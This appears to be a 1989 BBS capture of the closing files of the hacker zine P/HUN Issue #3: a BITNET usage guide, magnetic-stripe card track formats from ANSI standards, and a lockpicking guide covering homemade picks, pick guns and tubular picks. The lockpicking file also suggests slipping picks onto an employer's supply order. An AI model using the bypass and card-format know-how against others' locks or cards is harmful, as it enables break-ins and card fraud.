  5295.          maybe we should explore that one.)  The actual file that is
  5296.          transmitted is really nothing more than a formatted text file
  5297.          with a header.  When you send mail from you system,  You will
  5298.          be prompted to input a subject so the header can include the
  5299.          sending address, recieving address, date, and subject.  A
  5300.          piece of mail would look like this:
  5301.  
  5302.  
  5303.          Date:  Fri, 13 Jan 89 18:26:12 EDT
  5304.          From:  Terra <151133@DOLUNI1>
  5305.          Subject:  Greetings
  5306.          To:   $108@UKPR
  5307.          +
  5308.          =============================================================
  5309.          +  Hello Aristotle
  5310.          |
  5311.          |  Regarding the information that I have been recieving
  5312.          |  directed to a member of the
  5313.          |  Chaos Computer Club.......
  5314.  
  5315. [more]                                               rest of text
  5316.  
  5317.  
  5318.  
  5319.  
  5320.  
  5321.          Files:
  5322.  
  5323.               The file is the best way to send large amounts of
  5324.          information over BITNET.  As with mail, files are stored
  5325.          until you read them or in the case of node being down, until
  5326.          they are back up.  Any type of file can be sent via a file.
  5327.          They can be either text or binary.  On a VM/CMS system, one
  5328.          would use the SHIP command to send a file over BITNET.  Below
  5329.          is an example:
  5330.  
  5331.  
  5332.          SHIP filename filetype userid@node
  5333.  
  5334.          or
  5335.  
  5336. [more]                SHIP phun3 txt $108@UKPR
  5337.  
  5338.          I suggest that you check your online help for information on
  5339.          sending info over BITNET.
  5340.  
  5341.          Now for the phun part....
  5342.  
  5343.          FILE SERVERS, CHAT RELAYS, AND SERVICES:
  5344.  
  5345.               Servers are machines set up as automated databases for
  5346.          the distribution of various information.  Servers respond to
  5347.          commands via mail or message.  Not all use accept this type
  5348.          of communication.  It all depends on the type of software the
  5349.          server is running.  One would send a message to a server in
  5350.          the following syntax:
  5351.  
  5352.  
  5353.          TELL userid@node command
  5354.  
  5355.          or
  5356.  
  5357. [more]                Tell listserve@bitnic help
  5358.  
  5359.               File servers are like servers but they are set up as
  5360.          databases that transmit files.  They are kinda like BBS's.
  5361.          The best way to get started with a file server is to send it
  5362.          the help command.
  5363.  
  5364.  
  5365.          A good place to start is the Listserv@Bitnic system.  It
  5366.          will send you all the information you will need to get
  5367.          started.
  5368.  
  5369.               Name servers have two functions.  The first is to locate a
  5370.          person's address on BITNET and the second is to help you find
  5371.          people on BITNET with similar interests.  (Hmmm, a hacker
  5372.          directory?)
  5373.  
  5374.          I suggest starting with the name server at Drew University.
  5375.  
  5376.          To find a particular person, just send the following to
  5377.          Drew:
  5378. [more]       
  5379.          TELL NAMESERV@DREW SEARCH/NAME john doe
  5380.  
  5381.          If the person you are looking for is not registered, you will
  5382.          recieve a message informing you of that.
  5383.  
  5384.          To register yourself, send the following to Drew:
  5385.  
  5386.          TELL NAMESERV@DREW REGISTER first last interests
  5387.  
  5388.          or
  5389.  
  5390.          TELL NAMESERV@DREW REGISTER John Doe LMOS hacking
  5391.  
  5392.  
  5393.               A chat relay is set up to allow many users to chat with
  5394.          each other without having everyone sending messages to each
  5395.          other individually.  When on a relay, the people on your
  5396.          channel (be it public or private) will all see the messages
  5397.          that you send to them.  This is GREAT for phreaker
  5398.          conferences (Though it is NOT secure due to system operators)
  5399. [more]                and just chatting with your friends over LONG distances.
  5400.          Geee and it is all legal too!  To find out more about relays,
  5401.          just send the following:
  5402.  
  5403.  
  5404.          TELL RELAY@UTCVM help
  5405.  
  5406.          If your local relay is not UTCVM, you will receive a message
  5407.          tell you that and also your correct relay.
  5408.  
  5409.  
  5410.  
  5411.               Well, that's it for this file. If you have any questions
  5412.          about BITNET, you can contact me at the following boards:
  5413.  
  5414.  
  5415.          Hacker's Den       718-358-9209
  5416.          The Outlet Private 313-261-6141 Newuser/Kenwood
  5417.  
  5418.  
  5419. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5420. [more]       =                 P/HUN Issue #3, Volume 2: Phile #10 of 11                   =
  5421. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5422.  
  5423.                 PLASTIC CARD ENCODING PRACTICES AND STANDARDS
  5424.                 ---------------------------------------------
  5425.                                 By Hasan Ali
  5426.                          For P/HUN Issue #3
  5427.  
  5428.  
  5429.                    GENERAL PHYSICAL CHARACTERISTICS
  5430.                    --------------------------------
  5431.  
  5432. If you take any plastic card (MasterCard, VISA, AMEX, ATM cards, etc.) and
  5433. turn it over you will find a thin black strip of magnetic material.  This
  5434. strip has the ability to hold multiple "tracks" or bands of encoded data.
  5435. There are 3 valid tracks.  Track 1 is the track nearest to the top of the
  5436. card, and it is followed by Tracks 2 and 3.  The original specifications
  5437. allowed for Tracks 1 and 2 only, and they are both read-only.  The
  5438. additional Track 3 furnishes an ability to read OR write.
  5439.  
  5440.  
  5441. [more]                                      TRACK 1
  5442.  
  5443.  
  5444. The International Airlines Transport Association originated the development
  5445. of Track 1 as the official track airline use and, in fact, it defined the
  5446. data and encoding formats for the ANSI standard.  This track was originally
  5447. designed to allow the use of customer-operated ticket dispensing machines
  5448. to cut down the traffic at airport ticket counters.
  5449.  
  5450. Now, many other parties make use of Track 1 because it is the only encoded
  5451. track that permits encoding of the card holder's name.  With this alphanumeric
  5452. capacity, the card holder's name can be printed on an EFT terminal receipt
  5453. rather cheaply, otherwise the name would have to be sent the computer, which
  5454. would be more costly and would take more time.
  5455.  
  5456. There are 26 formats for Track 1, and they are designated by codes from "A" to
  5457. "Z".  Format "B" is shown below.
  5458.  
  5459. Field Name                    Length(chars)
  5460.  
  5461. Start sentinel                    1
  5462. [more]       Format code = "B"                1 (alpha only)
  5463. Primary account number                Up to 19
  5464. Separator (SEP)                    1
  5465. Country code                    3
  5466. Name                        2 to 26
  5467.     Surname
  5468.     Surname SEP = "/"
  5469.     First name or initial
  5470.     Space (when required)
  5471.     Middle name or initial
  5472.     Period (when followed by title)
  5473.     Title (when used)
  5474. SEP                        1
  5475. Expiration date or SEP                4 or 1
  5476. Discretionary data                balance up to maximum
  5477.                         track length
  5478. End sentinel                    1
  5479. Longitudinal Redundancy Check (LRC)        1
  5480.  
  5481. MAXIMUM TRACK LENGTH                79
  5482.  
  5483. [more]       Format code "A" is reserved for proprietary use by the card issuer.  Format
  5484. codes "C" through "M" are reserved by ANSI for use in other data formats of
  5485. Track 1.  Format codes "N" through "Z" are available for use by individual
  5486. card issuers.
  5487.  
  5488.  
  5489.                                TRACK 2
  5490.  
  5491.  
  5492. The American Bankers Association led to the development of Track 2 on behalf
  5493. of two credit card companies (Interbank and VISA) and their members.  The
  5494. intent was to have a standardized plastic card which could be used at point-
  5495. of-sale (POS) terminals to obtain authorization for credit card transactions.
  5496.  
  5497. Today, in the financial industry, Track 2 is the most widely used encoding
  5498. method for plastic cards.  It has a strong following because most EFT
  5499. terminals are connected directly to a computer that accesses the cardholder's
  5500. data files.  Also, it is the preferred choice of the ABA and is the only track
  5501. recognized and supported by MasterCard and VISA.
  5502.  
  5503. The format of Track 2 is shown below.
  5504. [more]       
  5505. Field Name                    Length (chars)
  5506.  
  5507. Start sentinel                    1
  5508. Primary account number                up to 19
  5509. SEP                        1
  5510. Country code                    3
  5511. Expiration date or SEP                4 or 1
  5512. Discretionary data                balance up to maximum
  5513.                         track length
  5514. End sentinel                    1
  5515. LRC                        1
  5516.  
  5517. MAXIMUM TRACK LENGTH                40
  5518.  
  5519. Although Track 2 is widely accepted, there is a serious potential concern
  5520. about it because of its limited encoding capacity - only 40 characters.  The
  5521. argument supporting the current capacity stresses that all the necessary
  5522. information to authorize a transaction is at the data center thereby
  5523. eliminating the need to encode extraneous data.  On the other hand, those
  5524. suggesting that the capacity be increased feel that greater capacity would
  5525. [more]       allow certain transactions to be approved directly at the terminal, or,
  5526. at least, minimize data sent between terminal and computer for each
  5527. transaction.  Those who hold this view are using Tracks 1 and 3.
  5528.  
  5529.  
  5530.                                TRACK 3
  5531.  
  5532.  
  5533. Track 3 was developed for use in off-line EFT terminals but was designed
  5534. to be compatible with other plastic card standards.  Thus, Track 3 is
  5535. compatible with the ANSI standard for embossing plastic cards and the ANSI
  5536. standard for physical characteristics of magnetic stripes.  More recently,
  5537. financial institutions have started to use it in on-line systems because
  5538. of its greater data storage capacity.
  5539.  
  5540. The format of Track 3 follows.
  5541.  
  5542. Field Name            Usage    Status    Length (chars)
  5543.  
  5544. Start sentinel            M    S    1
  5545. Format Code            M    S    2
  5546. [more]       Primary account number (PAN)    M    S    19
  5547. SEP                M    S    1
  5548. Country code or SEP        M    S    3 or 1
  5549. Currency            M    S    3
  5550. Currency exponent        M    S    1
  5551. Amount authorized per        M    S    4
  5552.     cycle period
  5553. Amount remaining this cycle    M    D    4
  5554. Cycle begin            M    D    4
  5555. Cycle length            M    S    2
  5556. Retry count            M    D    1
  5557. PIN control parameters or SEP    M    S    6 or 1
  5558. Interchange control        M    S    1
  5559. Type of account and        M    S    2
  5560.     service restriction (PAN)
  5561. Type of account and        M    S    2
  5562.     service restriction (SAN-1)
  5563. Type of account and        M    S    2
  5564.     service restriction (SAN-2)
  5565. Expiration date or SEP        M    S    4 or 1
  5566. Card sequence number        M    S    1
  5567. [more]       Card security number or SEP    M    S    9 or 1
  5568. First subsidiary account    O    S    variable
  5569.     number (SAN-1)
  5570. SEP                M    S    1
  5571. Second subsidiary account    O    S    variable
  5572.     number (SAN-2)
  5573. SEP                M    S    1
  5574. Relay marker            M    S    1
  5575. Crypto check digits or SEP    M    D    6 or 1
  5576. Discretionary data        O    D    variable
  5577. End sentinel            M    S    1
  5578. LRC                M    D    1
  5579.  
  5580. MAXIMUM TRACK LENGTH                107
  5581.  
  5582. "M" - Mandatory field    "O" - Optional field
  5583. "D" - Dynamic field - may be modified by appropriate interchange partners
  5584. "S" - Static field - may only be modified by card issuer
  5585.  
  5586.  
  5587.  
  5588. [more]       For further information on these topics, find these ANSI publications
  5589. at your local good technical library:
  5590. ANSI X4.13-1979
  5591. ANSI X4.16-1973
  5592. ANSI X4.16-(Draft October 1980)
  5593. ANSI X9.1-1980
  5594.  
  5595. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5596. =                  P/HUN Issue #3, Volume 2: Phile 11 of 11                   =
  5597. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5598.  
  5599.                           -----------------------------
  5600.                           -LOCKPICKING:AN INDEPT GUIDE-
  5601.                           -----------------------------
  5602.                                By: The LockSmith
  5603.  
  5604. --------------------
  5605. PART 1-GENERAL INFO:
  5606. --------------------
  5607. There are many circumstances in which entry is required when the key(s)are 
  5608. unavalable. While forms of force can often be used, many times the use of force
  5609. [more]       is undesirable.The answer in many cases, is a procedure/art/skill called 
  5610. Lockpicking.
  5611.  
  5612. -------------
  5613. PART 2-TOOLS:
  5614. -------------
  5615. There are a number of types of lock picking tools.
  5616. Some of the more common types are:
  5617.  
  5618. -----------
  5619. HAND PICKS:
  5620. -----------
  5621. Tools used to directly manipulate the pins(tumblers) of a lock cylinder.
  5622.  
  5623. ----------
  5624. PICK GUNS:
  5625. ----------
  5626. A semi-automatic tool used to manipulate the pins(tumblers) of a lock cylinder.
  5627. NOTE:The theory of pick guns, while fairly simple appears to be beyond the 
  5628. scope of this file.
  5629. However:if I get enough requests for the theory, an addendum will be written.
  5630. [more]       
  5631. -------------------
  5632. TUBULAR LOCK PICKS:
  5633. -------------------
  5634. A manual tool used to manipulate the pins(tumblers)of a tubular lock cylinder
  5635. ("skate key" appearance), an example of this type of lock is the Kriptonite(Tm)
  5636. bike locks.
  5637.  
  5638. ------------------
  5639. PASS KEYS(WARDED):
  5640. ------------------
  5641. These are pre-cut pieces of flat metal used to open warded locks(usually these
  5642. are padlocks, and usually are poor quality).
  5643. These locks can generally be identified by a key that has toy-like square cuts
  5644. on *BOTH* sides of the key, and the lock  has a VERY large keyway(keyhole)
  5645. As these are just inserted like a key and rotated to open the lock, no further
  5646. instructions are required.
  5647. NOTE:these locks can often be open in a pinch using a piece of wire with a 90
  5648. dregree bend(a "L" shape).
  5649.  
  5650.  
  5651. [more]       ----------------------
  5652. PART 3-TYPES OF LOCKS:
  5653. ----------------------
  5654. Some of the more common types:
  5655. ------------------------------
  5656. PIN TUMBLER:The most common type for both padlocks and residental lock 
  5657. cylinders.A variation on this is a pin tumbler cylinder that uses a side bar 
  5658. design(E.G. An example is Medeco)
  5659. No matter who makes it, a true high security cylinder will generally prove to 
  5660. be virtually unpickable.
  5661.  
  5662.  
  5663. WAFER TUMBLER:Used on some padlocks, but mostly used on specialty locks, 
  5664. EG..desk drawers, showcase locks(the locks used on glass sliding doors in a 
  5665. cabinet, usually used to deter theft), telephone locks, liquor
  5666. cabinet, etc. Also, a variation is used on most auto locks, but most are not
  5667. redily pickable, as they have a sidebar design.
  5668. NOTE:you can tell a wafer lock from a pin tumbler lock by looking into the 
  5669. keyway. If you see round pins, then it is a pin tumbler, but if you see flat 
  5670. strips, then it is a wafer tumbler lock.
  5671.  
  5672. [more]       
  5673. LEVER:These locks are likely to be seen in only 3 applications  1.The old mail 
  5674. box locks(the ones that use a flat key), bank safe deposit box locks, and coin 
  5675. telephone locks.A variant were the locks used on old doors(these are properly 
  5676. called warded bit locks, but most people seem to call them "skeleton key" 
  5677. locks)..these are the kind that you could look through the keyhole and see 
  5678. what was happening on the other side.This type was also used for some old 
  5679. furniture locks(cabinets and drawers mostly). 
  5680.  
  5681.  
  5682. WARDED:These locks, generally poor quality ones are generally used for padlocks
  5683. , they are also used outdoors if extreme conditions prevail(EG:sand and salt 
  5684. water)this is because these locks have few moving parts, and have large spaces 
  5685. in their design.A variation on this is often used for luggage locks.
  5686. NOTE:the key may LOOK like either a Pin tumbler or a lever lock key, but in 
  5687. most cases these locks are warded and can be open in a simular fashion.
  5688. A hint:this is one of the rare situations where a bobby pin may actually be 
  5689. usefull.
  5690.  
  5691. TUBULAR LOCKS:
  5692. These are used in several applications: 1.car alarm locks
  5693. [more]       2.home alarm locks
  5694. 3.kriptionite(Tm) bike locks
  5695. 4.older CHAPMAN(Tm) car locks
  5696. 5.Vending machines
  5697. These are used elsewhere as well.
  5698.  
  5699.  
  5700. PART 4 MAKING TOOLS:
  5701. --------------------
  5702. EXAMPLES:A easy place to get pictures of handpicks is the HPC catalog..
  5703. (HPC, Inc/Schiller Park,IL/60176(Phone #(312)671-6280).
  5704. This is one of the largest locksmithing supply manufacturers
  5705. You can call, or write, or if you can find a local locksmith supply house, they
  5706. may have copies available.
  5707. Note that the drawings, allthough detailed, are smaller than the actual tools, 
  5708. but the size tends to be obvious.
  5709. NOTE:The correct size of a HPC pick handle is about 3 and 1/8 inches long.
  5710. If you have the the HPC drawings enlarged at a copy shop to just under 3x then
  5711. they will be of a useable size(If they can't do odd size enlargements, 3x 
  5712. should be close enough.
  5713.  
  5714. [more]       B:MATERAL:Many materials are suitable for making picking tools/tension tools
  5715. 1.Gutter broom bristles(those *BIG* trucks with the rotary brushes that wash 
  5716. and sweep the street at the same time). Look for the bristles after the truck 
  5717. leaves...generally at least a few break off...it is preferable to look near a 
  5718. irregular spot of the road, as this tends to induce bristle breakage.
  5719. Also, depending on your area, you may find that smaller trucks are used along 
  5720. with the larger ones...these generally use thinner bristles, which make better 
  5721. picks, but many times, the thicker type makes better tension wrenches
  5722. NOTE:A Package of strips/round strips of spring steel can be obtained from a 
  5723. locksmith supply house, but you will pay at least $18.00 for this!
  5724. NOTE:If you *really* to buy the tools..there 3 ways to go...
  5725. 1.Try to order them through the mail..allthough the feds have been trying to 
  5726. pass a bill prohibiting mailing picks, and door opening tools,  unless you can 
  5727. prove you are a bona-fide locksmith(not as hard as you might think)..THIS BILL 
  5728. HAS NOT PASSED AS OF YET. Also..the last time I checked am issue of HIGH TIMES
  5729. , there was a small advertisment in the back, and they had a pick set(for about
  5730. twice the price as the item's standard retail price.
  5731. 2.Try to work for a store/shop that has a locksmiths license(*NOT* a keymakers
  5732. license).
  5733. Sooner or later they will ask you to pick up supplies..if the supplier has what
  5734. you need, then you can add the items to the order.
  5735. [more]       3.try and make friends with a locksmith..he can get you tools.
  5736.  
  5737. ---------------
  5738. TOOLS REQUIRED:
  5739. ---------------
  5740. If you are trying to make your own picks these tools are a good start...
  5741. 1.A set of warding files(these are often available in the tool department of 
  5742. large discount stores...For example, for people in NYC, a chain of stores 
  5743. called Webers tends to have these at a good price.
  5744. While you can buy a set from a locksmith supply house, you will pay at least
  5745.  $20.00-$30.00 for a small set.
  5746. The discount store ones are generally $3.00-$5.00 a set.
  5747. While the quality is a bit lower, at least from my experience they do the job
  5748. ok.
  5749. 2.A small propane or butane torch(if butane, one that can be refilled with a
  5750. can of cigarette lighter butane will be a lot cheaper to operate.
  5751. Note:a gas(but NOT a electric)kitchen stove burner will often do in a pinch.
  5752.  
  5753. ------------------
  5754. HOW TO MAKE TOOLS:
  5755. ------------------
  5756. [more]       First, let's assume that you are starting with gutter broom bristles, as they
  5757. are generally easy to get, and cost nothing..
  5758. First, let's start with a tension wrench...
  5759. Take a piece about 4-5 inches long, and make a sharp bend 1/4-1/2 inch from 
  5760. the end(but DON'T make the bend so sharp that the strip cracks(if you want to
  5761. make a sharp bend, heat the strip at the point that you want to bend to red 
  5762. heat and let it AIR COOL do not cool in fluid, as this will make the metal 
  5763. harder!    After, if you want to reharden it, reheat, and plunge it into either 
  5764. oil or water(oil is better). If this results in the metal getting too hard, 
  5765. then try cooling it a little slower. A book on metal working may be useful.
  5766. Also, if you want to make a complicated bend(a half twist, for example)then 
  5767. heating the strip at the bend point will allow easy bending(this is one of 
  5768. those times where a kitchen gas stove probably will not quite make it.
  5769.  
  5770.  
  5771. PICKS...You need pictures or drawings
  5772. (preferably full size).
  5773. Once you have these, select a piece of metal, soften about 2-3 inches using 
  5774. a torch or gas burner, then get out your warding files and get to it!
  5775. NOTE:While in theory, you probably could file the strips without softening
  5776. them first, the metal is hardened, and resists being filed(this is also rough 
  5777. [more]       on the files). What may help, whether you soften or not, is that a metal 
  5778. nibbling tool can used for the rough shaping, and in some cases, can be used 
  5779. to do most of the work. However you do it, it may be advisable to file the 2 
  5780. flat sides of the tool(just a bit).
  5781.  
  5782.  
  5783. PART 5 USE OF TOOLS:
  5784. --------------------
  5785. The use of lockpicking tools is as much an art as it is a skill, but most 
  5786. persons with enough practice can learn to do a decient job.
  5787.  
  5788. A good book on the subject comes from HPC(again)(Basic Picking and Raking.
  5789. This runs around $15.00), this is a bit overpriced, but a good guide.
  5790. But, let's go on......
  5791.  
  5792.  
  5793. Hand picks:
  5794. -----------
  5795. There are 4 different types of picks
  5796. The rake
  5797. The hook(this has other names as well)
  5798. [more]       The diamond
  5799. The ball/double ball(2 balls stacked)
  5800.  
  5801. The rake:
  5802. ---------
  5803. The rake is prehaps the easiest tool to use, but it does not teach you much
  5804. about the lock you are working on;if this does not matter to you, then don't 
  5805. worry about it. Hold the cylinder or padlock in a upright position(the way 
  5806. it normally be mounted). The pins should be on the top.
  5807. Hold the pick with the more prominent wiggly side up(the hollow side down).
  5808. Tilt the back of the handle downward a bit;the wiggly part should be 
  5809. horizontal. Now put it down for a minute, and pick up a tension wrench(L shaped
  5810. piece), and insert the shorter bent end into the bottom of the keyway.
  5811. Now..
  5812. Rotate the wrench in the direction that the lock normally rotates to open-if
  5813. not sure-pick a direction.
  5814. Then..hold the pick so that the handle is angled towards you slightly;at this
  5815. angle the curved part should be horizontal. Insert the pick into the lock all 
  5816. of the way into the keyway, and making sure that contact is attained with the 
  5817. pins. Draw it out..repeat until lock is open. But..don't push the pins up by 
  5818. forcing the pick upward with great force...not only will this not open the 
  5819. [more]       lock, but you will bend the pick as well.
  5820. If it does not open:
  5821. First, release the tension(you should hear the pins drop).
  5822. 1.Try less(or more)tension on the tension wrench(NOTE:most problems are caused
  5823.  by too much tension).
  5824. 2.Try holding the pick at a slightly different angle and/or height.
  5825. 3.Try picking the lock in the other direction.
  5826.  
  5827. The hook:
  5828. ---------
  5829. The hook is used to lift individual pins in a cylinder.
  5830. The tension wrench is inserted and rotated the same way as above.
  5831. After putting tension on the wrench, insert the hook into the keyway with the 
  5832. hook upward. Then, starting from the rearmost pins, lift each pin.
  5833. To do this:Lift the pin until you feel a bump, or a "click", or a change in 
  5834. the spring action of the pin then STOP and go to the next pin.
  5835. Continue this until the lock opens.
  5836. If it does not open release the tension then:
  5837. 1.Try with more or less tension(NOTE:usually the problem is too much tension,
  5838.   so try lowering it first).
  5839. 2.Try starting from the front pins, instead of the back ones.
  5840. [more]       3.Try picking the lock in the other direction.
  5841.  
  5842. The diamond:
  5843. ------------
  5844. This tool is used the same way as the rake, as it is a modified rake design,
  5845. although it does not look the same.
  5846.  
  5847. The ball/double ball:
  5848. ---------------------
  5849. These tools are mainly used for picking wafer tumbler locks.
  5850. They are used the same way as the rake, except these locks open *so* easily,
  5851. that you probably won't have to worry about the lock not opening.
  5852. NOTE:these locks can often be open in a pinch by using a bent paper clip(rake
  5853. the wafers and rotate the clip at the same time)
  5854.  
  5855. PICK GUNS:
  5856. ----------
  5857. The most difficult part about using a pick gun is not using it, but getting the
  5858. damm thing in the first place. They are available from most of the same places
  5859. that hand picks are sold, but unlike hand picks, are not readily made at home.
  5860. If you manage to get one(the best one, at least in my opinion, is the LOCKAID.
  5861. [more]       This pick is made by a company called majestic.
  5862. It is made very well, has an ajustable strike force dial, and has a LIFETIME 
  5863. warranty!
  5864.  
  5865. Well, let's assume you have one of these tools...
  5866. Well the first thing is to get a lock(a small padlock is a good practice item)
  5867. then...
  5868. 1.insert the tension wrench at the bottom of the keyway, and rotate it in the 
  5869.  direction that the lock opens.
  5870. 2.starting with the pick gun's tension dial set either to 0 or 1(0=the point 
  5871.  that the dial will go no lower)(1=1 full turn in the opposite direction), take
  5872.  the pick gun and insert it's needle into the keyway, but try not to insert it 
  5873.  beyond the pins, as the needle may bind. Holding the tool horizontal, squeeze 
  5874.  the trigger. Do this 6-8 times, if no results then release the tension(on the 
  5875.  cylinder), raise the pick gun's tension dial 1 full turn, and try to open the
  5876.  lock again. Keep trying until you get it open.
  5877.  
  5878.  
  5879. TUBULAR LOCK PICKS:
  5880. -------------------
  5881.  
  5882. [more]       The best guide to using a tubular lock pick, is the instructions that come with
  5883. it. However, as these may not be available, these general notes will get you 
  5884. started. Also HPC has a tutorial on using tubular lock picks(Basic Picking and
  5885. Servicing Tubular Locks) (a bit costly, but if it is as good as other HPC 
  5886. tutorials I've seen, it may be worth it).
  5887.  
  5888. GENERAL INSTRUCTIONS:
  5889. ---------------------
  5890.  
  5891. 1. Take the pick and slide the feelers(the moveable tines) back and forth a few
  5892.  times. Slide all of them (usually 7) out past the end of the tool a bit(maybe
  5893.  1/8th of a inch or so). Then press the tool aginst a hard surface until all of
  5894.  the feelers are flush with the end of the tool.
  5895. 2.Insert the tool into the front of the lock and gently push it all of the way
  5896.  into the lock.
  5897.  Then rotate the tool in the direction required for opening, but use a minimum
  5898.  of force, as excessive force will cause 2 difficulties:
  5899. 1.The front of the pick may be damaged.
  5900. 2.The lock may not be able to be open at all, or if it can it may be damaged.
  5901. After rotating the pick, slowly pump it in and out of the lock but note that 
  5902. the pick should only be backed out about 1/8 inch or so.
  5903. [more]       Keep doing this;eventually the lock should open.
  5904. If not...start again from the start.
  5905.  
  5906.  
  5907.  
  5908. =-=-=-[ End of P/HUN Issue #3 :: Hacker's Den BBS (718)358/9209 ]-=-=-=-=-=-=-=
  5909.  
  5910.  
  5911.  
  5912.  
  5913. Vladmir, (in one HELL of an asid trip, mind you), has been axed
  5914. by the management to inform you "your time be up". Call tomorrow.
  5915.  
  5916.     ferret   logged out  09-Oct-89 12:34
  5917.  
  5918. H*4
  5919.  
  5920. NO CARRIER
  5921.